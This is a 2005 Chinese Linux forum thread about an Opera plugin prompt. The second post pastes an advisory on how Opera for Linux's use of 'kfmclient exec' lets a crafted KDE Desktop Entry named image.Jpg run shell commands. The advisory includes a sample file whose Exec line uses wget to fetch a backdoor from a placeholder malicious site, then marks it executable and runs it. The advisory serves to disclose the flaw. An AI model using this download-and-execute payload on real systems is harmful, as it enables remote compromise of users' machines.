当前时区为 UTC + 8 小时



发表新帖 回复这个主题  [ 2 篇帖子 ] 
作者 内容
1 楼 
 文章标题 : opera插件
帖子发表于 : 2005-10-08 0:54 
头像

注册: 2005-08-14 21:55
帖子: 58436
地址: 长沙
送出感谢: 4
接收感谢: 272
看不懂。kfmclient也没找到。


附件:
Opera插件提示.png
Opera插件提示.png [ 14.24 KiB | 被浏览 541 次 ]



_________________
● 鸣学
页首
 用户资料  
 
2 楼 
 文章标题 : 就找到这个
帖子发表于 : 2005-10-08 0:57 
头像

注册: 2005-08-14 21:55
帖子: 58436
地址: 长沙
送出感谢: 4
接收感谢: 272
描述:
Opera for Linux使用"kfmclient exec"作为默认应用程序处理保存文件。

"kfmclient exec"在处理文件名时存在问题,远程攻击者可以利用这个漏洞以用户进程权限执行任意SHELL命令。

实际上"kfmclient exec"命令可用于打开"Kde Desktop Entry",然后执行"Exec="中的命令。利用此漏洞需要一个特殊的文件名扩展,如果page.Htm用于文件名,并"kfmclient exec page.Htm"被打开,那么"Exec="中的命令就会执行,相反,如果"page.htm"用于文件名,那么就会作为"kde desktop entry"打开,被konqueror查看,因此如果构建一个名为Image.Jpg文件,包含如下条目:

--------image.Jpg----------

# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c
wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor

Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0

---- end of image.Jpg-------


_________________
● 鸣学


页首
 用户资料  
 
显示帖子 :  排序  
发表新帖 回复这个主题  [ 2 篇帖子 ] 

当前时区为 UTC + 8 小时


在线用户

正在浏览此版面的用户:没有注册用户 和 3 位游客


不能 在这个版面发表主题
不能 在这个版面回复主题
不能 在这个版面编辑帖子
不能 在这个版面删除帖子
不能 在这个版面提交附件

前往 :  
本站点为公益性站点,用于推广开源自由软件,由 DiaHosting VPSBudgetVM VPS 提供服务。
我们认为:软件应可免费取得,软件工具在各种语言环境下皆可使用,且不会有任何功能上的差异;
人们应有定制和修改软件的自由,且方式不受限制,只要他们自认为合适。

Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
简体中文语系由 王笑宇 翻译